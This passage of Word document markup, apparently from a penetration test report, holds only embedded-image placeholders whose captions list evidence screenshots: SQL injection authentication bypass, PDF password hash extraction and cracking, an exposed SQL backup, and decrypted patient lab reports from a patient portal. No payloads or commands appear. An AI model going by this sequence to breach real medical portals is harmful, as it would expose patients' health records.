              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="02_Baseline_Burp_Response.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3030971"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>02 Baseline Burp Response — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3030971"/>
            <wp:docPr id="22" name="Picture 22"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="03_SQLi_Test_Request.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3030971"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>03 SQLi Test Request — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1820834"/>
            <wp:docPr id="23" name="Picture 23"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="04_SQLi_Auth_Bypass_Response.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1820834"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>04 SQLi Auth Bypass Response — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1398693"/>
            <wp:docPr id="24" name="Picture 24"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="05_PDF_Hash_Extraction.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1398693"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>05 PDF Hash Extraction — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2904329"/>
            <wp:docPr id="25" name="Picture 25"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="06_Public_SQL_Backup.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2904329"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>06 Public SQL Backup — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2890258"/>
            <wp:docPr id="26" name="Picture 26"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="07_Patient_Portal_Lab_Reports.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2890258"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>07 Patient Portal Lab Reports — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2897816"/>
            <wp:docPr id="27" name="Picture 27"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="08_Patient_Report_Download_Links.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2897816"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>08 Patient Report Download Links — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3030971"/>
            <wp:docPr id="28" name="Picture 28"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="09_Patient_Authentication_Bypass.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3030971"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>09 Patient Authentication Bypass — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2409017"/>
            <wp:docPr id="29" name="Picture 29"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="10_Old_Directory_Index.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2409017"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>10 Old Directory Index — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2904329"/>
            <wp:docPr id="30" name="Picture 30"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="11_Patient_Directory_Index.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2904329"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>11 Patient Directory Index — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2904329"/>
            <wp:docPr id="31" name="Picture 31"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="12_Error_Log_Metadata.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2904329"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>12 Error Log Metadata — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2876186"/>
            <wp:docPr id="32" name="Picture 32"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="13_Patient_Login_Form.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2876186"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>13 Patient Login Form — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="7621451"/>
            <wp:docPr id="33" name="Picture 33"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="14_Patient_Report_1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="7621451"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>14 Patient Report 1 — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2010822"/>
            <wp:docPr id="34" name="Picture 34"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="15_Patient_Report_1_Decryption.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2010822"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>15 Patient Report 1 Decryption — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="7758935"/>
            <wp:docPr id="35" name="Picture 35"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="16_Patient_Report_2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="7758935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>16 Patient Report 2 — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2185672"/>
            <wp:docPr id="36" name="Picture 36"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="17_Patient_Report_2_Decryption.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2185672"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>17 Patient Report 2 Decryption — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="7655420"/>
            <wp:docPr id="37" name="Picture 37"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="18_Patient_Report_3.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="7655420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>18 Patient Report 3 — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1046010"/>
            <wp:docPr id="38" name="Picture 38"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="19_Patient_Report_3_Decryption.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1046010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>19 Patient Report 3 Decryption — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2884629"/>
            <wp:docPr id="39" name="Picture 39"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="20_Patient_Reports_Listing.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2884629"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>20 Patient Reports Listing — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2552545"/>
            <wp:docPr id="40" name="Picture 40"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="21_PDF_Crack_Execution.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2552545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
